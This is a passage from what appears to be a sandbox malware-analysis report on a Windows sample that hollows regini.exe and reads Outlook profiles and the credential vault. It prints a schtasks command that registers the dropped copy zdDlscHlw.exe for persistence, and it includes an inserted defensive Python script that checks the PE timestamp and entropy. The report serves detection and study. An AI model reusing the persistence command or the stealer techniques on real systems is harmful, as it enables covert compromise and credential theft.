                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\regini.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: C6Abn5cBei.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: C6Abn5cBei.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C6Abn5cBei.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: vpxg.pdb source: C6Abn5cBei.exe, zdDlscHlw.exe.0.dr
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mDeEygzSIDmBTP.exe, 00000010.00000000.1799904534.00000000008DE000.00000002.00000001.01000000.0000000D.sdmp, mDeEygzSIDmBTP.exe, 00000014.00000002.2687661742.00000000008DE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: C6Abn5cBei.exe, 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003960000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1874104293.000000000360E000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1877107030.00000000037B8000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003AFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: C6Abn5cBei.exe, C6Abn5cBei.exe, 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003960000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1874104293.000000000360E000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000003.1877107030.00000000037B8000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000011.00000002.2689015850.0000000003AFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: C6Abn5cBei.exe, 00000009.00000002.1874594973.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2687716808.0000000001578000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: vpxg.pdbSHA256 source: C6Abn5cBei.exe, zdDlscHlw.exe.0.dr
                Source: Binary string: regini.pdb source: C6Abn5cBei.exe, 00000009.00000002.1874594973.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, mDeEygzSIDmBTP.exe, 00000010.00000002.2687716808.0000000001578000.00000004.00000020.00020000.00000000.sdmp
                Source: C6Abn5cBei.exeStatic PE information: 0xEE97DEC3 [Mon Nov 5 05:06:11 2096 UTC]
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0041A84A push cs; ret 9_2_0041A84F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_00411964 push ds; retf 9_2_00411966
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_00414A73 push eax; retf 9_2_00414A74
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_00414355 pushfd ; iretd 9_2_00414356
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004033C0 push eax; ret 9_2_004033C2
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_00417475 push ds; retf 9_2_00417478
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0040B4B9 push ss; ret 9_2_0040B4BC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_00416635 push es; retf 9_2_00416674
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004166AE push es; retf 9_2_00416674
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011809AD push ecx; mov dword ptr [esp], ecx9_2_011809B6
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 10_2_05DB8548 push eax; iretd 10_2_05DB8549
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 10_2_05DB7EF3 pushfd ; retf 10_2_05DB7EF9
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 10_2_05DB7E5B push esp; retf 10_2_05DB7E61
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 10_2_05DB7E58 pushad ; retf 10_2_05DB7E59
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0145C54D pushfd ; ret 15_2_0145C54E
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0145C54F push 8B013E67h; ret 15_2_0145C554
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0145C9D7 push edi; ret 15_2_0145C9D9
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014109AD push ecx; mov dword ptr [esp], ecx15_2_014109B6
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_013E135E push eax; iretd 15_2_013E1369
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_013E1FEC push eax; iretd 15_2_013E1FED
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01467E99 push ecx; ret 15_2_01467EAC
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0330CB6B push ds; retf 16_2_0330CB6D
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_03315A51 push cs; ret 16_2_03315A56
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_03310902 push ebx; ret 16_2_03310903
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_03311837 push es; retf 16_2_0331187B
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_033118B5 push es; retf 16_2_0331187B
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_03311093 push ecx; retf 16_2_03311094
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_033107E7 push eax; ret 16_2_03310829
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0331267C push ds; retf 16_2_0331267F
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_033066C0 push ss; ret 16_2_033066C3
                Source: C:\Program Files (x86)\TUfZzwRYVxryfBUoJWLCrvrgRCHhzKfhQZkXyZWXFuBuUmEshYJjJQkfXdIpDEDyLcBeBPzvgmP\mDeEygzSIDmBTP.exeCode function: 16_2_0330FC7A push eax; retf 16_2_0330FC7B
                Source: C6Abn5cBei.exeStatic PE information: section name: .text entropy: 7.779278383035423
                Source: zdDlscHlw.exe.0.drStatic PE information: section name: .text entropy: 7.779278383035423
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeFile created: C:\Users\user\AppData\Roaming\zdDlscHlw.exeJump to dropped file
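                The two static indicators listed above, the link-time stamp 0xEE97DEC3 that resolves to November 2096 and the .text entropy of 7.78 that the sample shares with its dropped copy zdDlscHlw.exe, come straight from the PE header and can be rechecked without a sandbox. The Python below is an added triage example, not part of the Joe Sandbox report and not Joe Security's code. The minimal PE image it builds is constructed for the demonstration (DOS header, PE signature and COFF header only, nothing loadable), the pseudo-random buffer stands in for a packed .text section, the analysis date is assumed, and the 7.0 bits-per-byte threshold is the author's rule of thumb rather than a sandbox constant.

```python
"""Added example: recompute the static PE indicators (TimeDateStamp and
section entropy) that the sandbox flags, using only the standard library."""
import math
import random
import struct
from collections import Counter
from datetime import datetime, timezone

# TimeDateStamp value reported for C6Abn5cBei.exe.
REPORTED_TIMESTAMP = 0xEE97DEC3
# Assumed analysis date: 2025-01-10 00:00:00 UTC, as a Unix epoch value.
ASSUMED_ANALYSIS_EPOCH = 1736467200


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_timestamp(image: bytes) -> int:
    """Walk MZ -> e_lfanew -> PE signature -> IMAGE_FILE_HEADER and return TimeDateStamp."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF header layout: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    (timestamp,) = struct.unpack_from("<I", image, e_lfanew + 8)
    return timestamp


def timestamp_utc(timestamp: int) -> str:
    """Render a TimeDateStamp the way the report does, as a UTC date and time."""
    return datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def timestamp_is_suspicious(timestamp: int, analysis_epoch: float) -> bool:
    """A link time later than the analysis time cannot be genuine: the field is
    written by the linker and is trivially overwritten by the author."""
    return timestamp > analysis_epoch


def section_looks_packed(section: bytes, threshold: float = 7.0) -> bool:
    """Compiled x86 code normally sits well below 7 bits/byte; packed or encrypted
    payloads approach 8. The threshold is an assumption, not a sandbox constant."""
    return shannon_entropy(section) > threshold


def build_minimal_pe(timestamp: int) -> bytes:
    """Constructed test image: DOS header, PE signature and COFF header only."""
    e_lfanew = 0x40
    dos_header = bytearray(e_lfanew)
    dos_header[:2] = b"MZ"
    struct.pack_into("<I", dos_header, 0x3C, e_lfanew)
    coff_header = struct.pack(
        "<HHIIIHH",
        0x014C,     # Machine: IMAGE_FILE_MACHINE_I386
        1,          # NumberOfSections
        timestamp,  # TimeDateStamp
        0, 0,       # PointerToSymbolTable, NumberOfSymbols
        0xE0,       # SizeOfOptionalHeader (PE32)
        0x0102,     # Characteristics: EXECUTABLE_IMAGE | 32BIT_MACHINE
    )
    return bytes(dos_header) + b"PE\0\0" + coff_header


def packed_section_sample(size: int = 64 * 1024, seed: int = 1588774) -> bytes:
    """Constructed stand-in for a packed .text section: seeded pseudo-random bytes."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(size))


if __name__ == "__main__":
    image = build_minimal_pe(REPORTED_TIMESTAMP)
    ts = pe_timestamp(image)
    print(f"TimeDateStamp 0x{ts:08X} = {timestamp_utc(ts)} UTC, "
          f"suspicious={timestamp_is_suspicious(ts, ASSUMED_ANALYSIS_EPOCH)}")
    section = packed_section_sample()
    print(f"section entropy {shannon_entropy(section):.3f} bits/byte, "
          f"packed={section_looks_packed(section)}")
```

                Run against a real file, `pe_timestamp(open(path, "rb").read())` gives the raw field and `shannon_entropy` over the .text raw bytes reproduces the reported 7.78; two files with byte-identical section entropy to fifteen digits, as C6Abn5cBei.exe and zdDlscHlw.exe.0.dr have here, are almost certainly the same image copied to a new path.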

                Boot Survival

                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zdDlscHlw" /XML "C:\Users\user\AppData\Local\Temp\tmpE61C.tmp"

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
